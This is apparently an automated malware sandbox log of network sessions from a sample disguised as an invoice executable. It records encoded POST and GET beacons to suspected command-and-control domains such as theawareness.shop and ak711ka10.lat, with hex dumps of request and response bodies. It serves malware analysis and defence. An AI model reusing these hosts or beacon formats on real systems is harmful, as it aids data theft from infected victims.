                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6XoHLcYZuLwxjhLPCIUxlwo86rJWge7qcg2vCsH8CElroyIesz%2FpaGU%2FqTHIz%2F3%2FongVCEeCw44LaYQIaCfx1NH%2BYcIpl25H3ESRGflrn02lS3QDpphriAxuqP0wuWaBRmRQ64V4jf4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a54165977464e-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=711&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 190


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            31192.168.2.550014172.67.177.220803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:41.922687054 CEST1728OUTPOST /df5c/ HTTP/1.1
                                                                                            Host: www.theawareness.shop
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.theawareness.shop
                                                                                            Referer: http://www.theawareness.shop/df5c/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 76 52 75 77 31 76 62 6e 74 53 7a 65 4a 6f 67 50 30 77 51 4a 36 4c 67 7a 70 55 75 64 59 6e 42 6d 6d 4e 6f 41 41 62 4b 6c 4e 77 72 33 56 38 72 47 54 55 6f 6d 75 69 69 51 47 74 56 2f 30 69 35 4d 68 45 6f 64 52 54 79 75 37 45 79 6a 2f 62 47 76 4b 53 6b 58 6b 52 62 63 41 45 78 69 46 57 78 78 51 53 49 43 4a 31 6f 43 4e 4d 7a 74 59 6c 77 50 72 34 2b 61 2b 42 50 44 43 61 44 47 33 53 6a 77 4a 4f 64 37 74 72 57 48 70 48 44 51 6a 58 6c 32 44 73 67 7a 4f 46 65 7a 61 67 71 51 45 4c 64 66 76 53 57 6b 34 5a 2f 2b 4e 45 46 64 77 64 63 49 5a 72 32 77 65 38 2f 4a 70 59 77 5a 4b 54 42 46 61 6f 6c 79 58 57 6d 63 44 6a 69 58 77 41 39 6d 6c 44 54 75 47 63 6a 55 76 74 4c 30 39 45 54 4b 48 73 5a 6d 32 42 44 79 30 6e 79 62 66 4e 6e 2b 49 6d 35 6a 53 59 42 6e 79 78 68 4a 57 4f 42 2f 44 4c 78 59 67 69 50 32 32 6f 46 70 55 41 73 62 63 72 73 6b 4a 6e 75 57 2f 41 79 53 6b 31 69 6c 31 50 71 6b 73 4b 63 58 63 72 67 35 38 66 45 4d 6e 38 46 52 36 75 54 4e 73 44 70 2f 4b 2b 6e 69 42 69 31 42 47 52 41 4f 74 31 61 [TRUNCATED]
                                                                                            Data Ascii: pZxtux=vRuw1vbntSzeJogP0wQJ6LgzpUudYnBmmNoAAbKlNwr3V8rGTUomuiiQGtV/0i5MhEodRTyu7Eyj/bGvKSkXkRbcAExiFWxxQSICJ1oCNMztYlwPr4+a+BPDCaDG3SjwJOd7trWHpHDQjXl2DsgzOFezagqQELdfvSWk4Z/+NEFdwdcIZr2we8/JpYwZKTBFaolyXWmcDjiXwA9mlDTuGcjUvtL09ETKHsZm2BDy0nybfNn+Im5jSYBnyxhJWOB/DLxYgiP22oFpUAsbcrskJnuW/AySk1il1PqksKcXcrg58fEMn8FR6uTNsDp/K+niBi1BGRAOt1a/pADx8QP9Q7Tk88J0zYiQi3B+Rl4TQkbCfqHasgZ0nfCsfCI9rnT+RDVc3qO6ITJlAJ1vLn4LwVDCyGyKpP1VC3VqhRIlBuLzSN6jsevcN68Eo+tRn+CPZ5KMTaWDo9yhD9KR4bmu5SBEDl11dndjwi3oxB5fS3yxYCciQ6P025AmmJw54Kh6D/vgqbfcMAs9PV7OtqRq7cNL2hxYkmiGOOLcpjk/9XFbO7LWP4iMC1uCVjxvhgf0YY74lz+89vtVFvUlXMLPGBjFVvOEiPwDQXkazMGeXkxmoaTw0jBQzxbhCpKi62XrvXAfmFOXPJ+J+nEHkDvU5OiNiYXcX9SfoxQPGSpWgG4sEN9Z1zc02EL6EQ+G/HQm1bomKtqPLOmnEspfJW7njv0KNAO6333xG6X4kWX2W7nLun/+8UCMleeKxk17A4iYN0RiBHviv4naTkpjDKgtMvyYyL5/IpdNGc4FJt4W1aQU+LhgPy6kmws3ige5pcJSgkSJAOj8vO//vnQsstXo+HKbf1Vntj+UObsCPRy2BgP+deNCb6E3Zoy/7RAL7b/EuV+Tcg0G1fp0GOYnNUST6ZnpkggVrnhTTXeQh6gmV5Vg4wA/TXx2M3ITeORFqX5ISbFTK0TOooKU5dCl0Mp7QR3MDDmlVaETzx2T14/p6FHWw [TRUNCATED]
                                                                                            Oct 24, 2024 15:31:42.643667936 CEST877INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqoyXcAqf%2FeGAMp%2FmLm3K5Qrz8imcU57RBqdHCnhQgvEdeHB%2F1O32xmLFvg6IvUMr%2BwaUdIInu4i44RLtbtEohBXrfMjXZ8N4UbDZl6oKNxv8v%2FsgWt5r1pHXWS%2FREC0FcP2hp1TEDU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a54266c6b83a1-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1378&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1728&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                            Data Ascii: 19
                                                                                            Oct 24, 2024 15:31:42.643974066 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            32192.168.2.550015172.67.177.220803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:44.461519003 CEST418OUTGET /df5c/?pZxtux=iTGQ2f3/8wLaRYQP0xZx681X5jLmVFU/oLVVEoegdR+OVsnqcEQj6iurR8BAvDospkEZVkGP6nTG7c6sAiwUrDOAfXxLGlgGaAd3CytgAtbKInIGuq2UlXDJcOT7zCeYfw==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.theawareness.shop
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:45.140120029 CEST820INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ET%2BJwMAwEgYpZKAkdNYkPt7KcevZM9KfP8gYRXHpemXgxm8fA3c01KUXGl8XP0qazUPrLPrVikGuFgyuPB5PT9hgmBy6%2BvG6bHw700W7XuucYu0wDKVRKv7s%2BYoub9xqZ3Nk0ZemaE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a54362aeba91e-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            33192.168.2.550016154.23.181.7803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:50.203567028 CEST679OUTPOST /o5z9/ HTTP/1.1
                                                                                            Host: www.ak711ka10.lat
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.ak711ka10.lat
                                                                                            Referer: http://www.ak711ka10.lat/o5z9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 2b 33 64 66 2f 2b 4a 49 6b 79 41 4c 70 42 77 6f 6a 6d 51 31 6c 36 68 35 4a 58 50 4d 55 66 4f 68 4d 41 4c 30 4b 44 45 47 45 7a 2b 36 4a 42 31 43 39 71 37 44 45 69 4b 61 35 2b 50 74 30 41 71 52 76 72 56 4c 31 77 48 36 55 56 6f 4b 34 55 67 50 58 38 39 69 62 37 54 53 41 79 57 79 65 46 57 7a 69 71 6c 73 51 61 5a 65 42 41 43 53 2b 70 65 6e 6a 56 38 2b 62 33 77 72 55 52 50 42 65 79 4b 63 30 4a 6d 74 56 57 30 30 6d 58 67 71 45 61 4a 59 6d 57 51 44 51 42 7a 64 66 5a 6d 30 70 51 43 4b 49 4e 78 69 67 52 32 35 4d 33 72 47 78 51 45 43 4a 72 65 31 42 6f 64 32 6b 53 52 71 63 76 4f 45 39 77 52 4c 57 32 30 3d
                                                                                            Data Ascii: pZxtux=+3df/+JIkyALpBwojmQ1l6h5JXPMUfOhMAL0KDEGEz+6JB1C9q7DEiKa5+Pt0AqRvrVL1wH6UVoK4UgPX89ib7TSAyWyeFWziqlsQaZeBACS+penjV8+b3wrURPBeyKc0JmtVW00mXgqEaJYmWQDQBzdfZm0pQCKINxigR25M3rGxQECJre1Bod2kSRqcvOE9wRLW20=
                                                                                            Oct 24, 2024 15:31:51.148569107 CEST691INHTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Thu, 24 Oct 2024 13:31:50 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 548
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            34192.168.2.550017154.23.181.7803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:52.964663029 CEST699OUTPOST /o5z9/ HTTP/1.1
                                                                                            Host: www.ak711ka10.lat
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.ak711ka10.lat
                                                                                            Referer: http://www.ak711ka10.lat/o5z9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 2b 33 64 66 2f 2b 4a 49 6b 79 41 4c 70 68 67 6f 69 46 6f 31 6a 61 68 32 47 33 50 4d 64 2f 50 4a 4d 42 33 30 4b 42 6f 57 44 42 61 36 49 6b 5a 43 79 50 58 44 42 69 4b 61 32 65 50 6f 35 67 71 6b 76 72 70 31 31 31 2f 36 55 56 55 4b 34 52 45 50 51 4c 4a 74 62 72 54 63 4e 53 57 77 44 31 57 7a 69 71 6c 73 51 61 4d 37 42 41 71 53 2b 5a 75 6e 69 77 51 39 53 58 77 6f 64 78 50 42 4a 69 4b 59 30 4a 6d 62 56 58 6f 4e 6d 56 49 71 45 59 52 59 68 48 51 41 65 42 7a 66 48 35 6e 6d 68 43 2f 7a 50 74 39 79 72 67 48 77 56 57 33 4d 35 47 31 6f 54 4a 57 64 53 49 78 4f 30 42 5a 64 4e 66 76 74 6e 54 42 37 49 68 69 4b 50 57 48 5a 35 71 4e 66 62 76 75 53 33 6b 47 41 44 53 51 65
                                                                                            Data Ascii: pZxtux=+3df/+JIkyALphgoiFo1jah2G3PMd/PJMB30KBoWDBa6IkZCyPXDBiKa2ePo5gqkvrp111/6UVUK4REPQLJtbrTcNSWwD1WziqlsQaM7BAqS+ZuniwQ9SXwodxPBJiKY0JmbVXoNmVIqEYRYhHQAeBzfH5nmhC/zPt9yrgHwVW3M5G1oTJWdSIxO0BZdNfvtnTB7IhiKPWHZ5qNfbvuS3kGADSQe
                                                                                            Oct 24, 2024 15:31:53.883109093 CEST691INHTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Thu, 24 Oct 2024 13:31:53 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 548
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            35192.168.2.550018154.23.181.7803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:55.565495014 CEST1716OUTPOST /o5z9/ HTTP/1.1
                                                                                            Host: www.ak711ka10.lat
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.ak711ka10.lat
                                                                                            Referer: http://www.ak711ka10.lat/o5z9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 2b 33 64 66 2f 2b 4a 49 6b 79 41 4c 70 68 67 6f 69 46 6f 31 6a 61 68 32 47 33 50 4d 64 2f 50 4a 4d 42 33 30 4b 42 6f 57 44 42 53 36 4a 53 4e 43 7a 73 76 44 47 69 4b 61 2f 2b 50 70 35 67 71 39 76 72 77 79 31 30 44 51 55 51 59 4b 35 33 49 50 56 2f 56 74 56 72 54 63 45 79 57 31 65 46 57 71 69 71 31 33 51 61 63 37 42 41 71 53 2b 61 32 6e 6c 6c 38 39 55 58 77 72 55 52 50 4e 65 79 4b 30 30 4a 2b 4c 56 58 63 64 6d 46 6f 71 45 34 42 59 6b 78 45 41 53 42 7a 5a 53 35 6d 6a 68 43 7a 53 50 74 68 2b 72 67 44 61 56 52 62 4d 6f 6a 45 78 47 35 61 56 4a 4a 68 66 34 69 4e 6c 56 34 44 72 69 41 42 30 46 47 43 6b 50 58 54 4f 35 2b 74 2b 54 38 47 43 69 46 65 6b 54 53 70 43 6a 70 78 54 6d 45 79 62 53 37 73 67 37 51 66 6d 35 79 56 6e 43 70 72 35 31 42 4b 36 65 51 4d 66 79 38 75 54 43 4c 6d 62 59 7a 32 62 4d 43 35 43 51 66 6b 34 73 47 58 63 30 55 76 72 42 74 6f 69 43 6a 2b 4e 33 48 6e 4e 70 42 31 6d 76 59 32 33 73 4e 68 50 56 57 57 66 35 32 54 4b 64 66 52 53 59 4c 44 66 41 4d 4d 57 53 32 6e 57 74 72 38 [TRUNCATED]
                                                                                            Data Ascii: pZxtux=+3df/+JIkyALphgoiFo1jah2G3PMd/PJMB30KBoWDBS6JSNCzsvDGiKa/+Pp5gq9vrwy10DQUQYK53IPV/VtVrTcEyW1eFWqiq13Qac7BAqS+a2nll89UXwrURPNeyK00J+LVXcdmFoqE4BYkxEASBzZS5mjhCzSPth+rgDaVRbMojExG5aVJJhf4iNlV4DriAB0FGCkPXTO5+t+T8GCiFekTSpCjpxTmEybS7sg7Qfm5yVnCpr51BK6eQMfy8uTCLmbYz2bMC5CQfk4sGXc0UvrBtoiCj+N3HnNpB1mvY23sNhPVWWf52TKdfRSYLDfAMMWS2nWtr8M1q8btfGjTAjLGZ33wpbkp78pmnk89RQlTBk2ZCKvu771Um9VhtEQ09woO9ammMIH1hxMax3D9J6GtZsYgKtZCLWyGs9QagonRX7kFSc/Qb+L5GjtB1umVeJ5YBNIh6DLUGsoI5bhY0B7AAny69fW6l43gJZBbAH5dqkYqpI1OzO42eUYvx0ugc2nZ5jSxj0CPvkxaRFCwO6Tz70r0hgoOV+bImA/TLpnQvnqvGPmslTJaYbv4w04OfXTyUp2EVGSUMlc7nqEsXZpz9V8CHQG3HL8Ro3YQ32bmH6Kl/fCTVBU97ktqAfzZOLRG9+R/oGthZ666ClkA6hkcwPmQ/96v6yBl1iLySlNRlkeyWjrV01ojtjDRfyGAc3rmvUy/UlF7Le0cVlr1MCsZzVOKKFnxKhdLbmvm5ruouERoXGr0CIybdrDFHHLwwv5OzQE71Bh3lBdezXyj9MQ3JjipdzKagv3iotKhcQrH5GrPfMl1tJ+UdgHqfx/TaUbPqhtzNv8mADP3UA69RKEqlhuZmt6mW1uyyZle5v5AEAbO1sksPCn2uc9gw2iG2koYWfYBaJ4X62I5LqmcxXJ4LS1hCvuaWxNHlUfTFOQXytudnNcksySKyevTQYhPXmrrRtdzxDJfD6zAlqCY7R2z1qXtih2OLnFb0ynjQQqk [TRUNCATED]
                                                                                            Oct 24, 2024 15:31:56.509372950 CEST691INHTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Thu, 24 Oct 2024 13:31:56 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 548
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            36192.168.2.550019154.23.181.7803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:58.118626118 CEST414OUTGET /o5z9/?pZxtux=z11/8LNw/ilOmRo5iVplmq9QJ2/sY6O9S3jiPj8IKRvMXjps+f+3QxK4x8TDiA3fpLYwxgH4NhA45modVvBwao6NdyacUH38gYwDUqZfGQ230ajUqn4GEmUCWVLyRw7Now==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.ak711ka10.lat
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:59.072458982 CEST691INHTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Thu, 24 Oct 2024 13:31:58 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 548
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:09:28:50
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe
                                                                                            Wow64 process (32bit):true
